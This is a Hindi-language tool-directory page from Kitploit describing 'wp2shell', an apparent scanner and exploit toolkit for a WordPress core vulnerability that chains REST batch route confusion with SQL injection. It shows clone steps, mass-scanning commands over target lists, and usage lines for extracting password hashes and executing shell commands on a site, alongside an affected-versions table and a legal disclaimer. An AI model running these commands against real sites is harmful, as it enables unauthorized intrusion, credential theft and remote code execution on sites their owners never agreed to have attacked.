Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
wp2shell — wp2shell - WordPress CVE-2026-63030 Exploit & Scanner | Kitploit
उपकरण/GitHubGitHub/lutfifakee-project/wp2shell
Vulnerability ScannersExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHublutfifakee-project/wp2shell

wp2shell

wp2shell - WordPress CVE-2026-63030 Exploit & Scanner

रिपॉजिटरी देखें
611 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🔍 wp2shell - वर्डप्रेस CVE-2026-63030 भेद्यता स्कैनर और एक्सप्लॉइट

⚡ तेज़, रीयल-टाइम भेद्यता स्कैनर और CVE-2026-63030 (wp2shell) के लिए एक्सप्लॉइट


📌 परिचय

wp2shell एक व्यापक टूलकिट है जो CVE-2026-63030 का पता लगाने और उसका शोषण करने के लिए है, जो वर्डप्रेस में एक गंभीर भेद्यता है जो अनधिकृत हमलावरों को REST API बैच रूट कन्फ्यूज़न और SQL इंजेक्शन के माध्यम से रिमोट कोड निष्पादित करने की अनुमति देती है।

🔍 CVE-2026-63030 क्या है?

CVE-2026-63030 (wp2shell) एक गंभीर भेद्यता है जिसे Adam Kues (Assetnote / Searchlight Cyber) द्वारा खोजा गया है और जो वर्डप्रेस कोर को प्रभावित करती है। इसमें दो बग शामिल हैं:

  1. GHSA-ff9f-jf42-662q - REST बैच रूट कन्फ्यूज़न
  2. GHSA-fpp7-x2x2-2mjf - author__not_in SQL इंजेक्शन

📊 प्रभावित संस्करण



📦 क्लोन और सेटअप

root@kitploit:~
# Clone repository
git clone https://github.com/Lutfifakee-Project/wp2shell.git
cd wp2shell

# No dependencies required - uses Python standard library only!
# Python 3.7+ required

🛠️ शामिल उपकरण

1️⃣ wp2shell_scanner.py - तेज़ स्कैनर

बड़े पैमाने पर भेद्यता का पता लगाने के लिए मल्टी-थ्रेडेड रीयल-टाइम स्कैनर।

root@kitploit:~
# Basic scan
python wp2shell_scanner.py -f list.txt -o results.txt

# Skip SQLi test (faster)
python wp2shell_scanner.py -f list.txt -o results.txt --no-sqli-test

# JSON output
python wp2shell_scanner.py -f list.txt -j

2️⃣ wp2shell_intooutfile.py - INTO OUTFILE एक्सप्लॉइट

INTO OUTFILE RCE वेरिएंट को प्रदर्शित करता है (MySQL FILE विशेषाधिकार की आवश्यकता है)।

root@kitploit:~
# Single target
python3 wp2shell_intooutfile.py https://target.com

# Multiple targets
python3 wp2shell_intooutfile.py -f list.txt -t 10

3️⃣ wp2shell-exploit.py - एकल-फ़ाइल एक्सप्लॉइट

पोर्टेबल, एकल-फ़ाइल संस्करण जिसमें पूर्ण कार्यक्षमता है।

root@kitploit:~
# Check vulnerability
python wp2shell-exploit.py check https://target.com

# Read users (extract password hashes)
python wp2shell-exploit.py read https://target.com --preset users

# Read fingerprint
python wp2shell-exploit.py read https://target.com --preset fingerprint

# Execute command (after cracking hash)
python wp2shell-exploit.py shell https://target.com --user admin --password "cracked" --cmd "id"

⚠️ कानूनी अस्वीकरण

महत्वपूर्ण: यह उपकरण केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है।

  • केवल उन सिस्टम पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।
  • कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है।
  • डेवलपर्स इस सॉफ्टवेयर के दुरुपयोग की कोई जिम्मेदारी नहीं लेते हैं। जिम्मेदारी और नैतिकता से उपयोग करें।
टूल डाउनलोड करें
संस्करण श्रेणीप्रभावस्थिति
6.9.0 - 6.9.4🔴 RCE (गंभीर)❌ संवेदनशील
7.0.0 - 7.0.1🔴 RCE (गंभीर)❌ संवेदनशील
6.8.0 - 6.8.5🟡 SQLi (उच्च)❌ संवेदनशील
6.9.5+ / 7.0.2+✅ पैच किया गया✅ सुरक्षित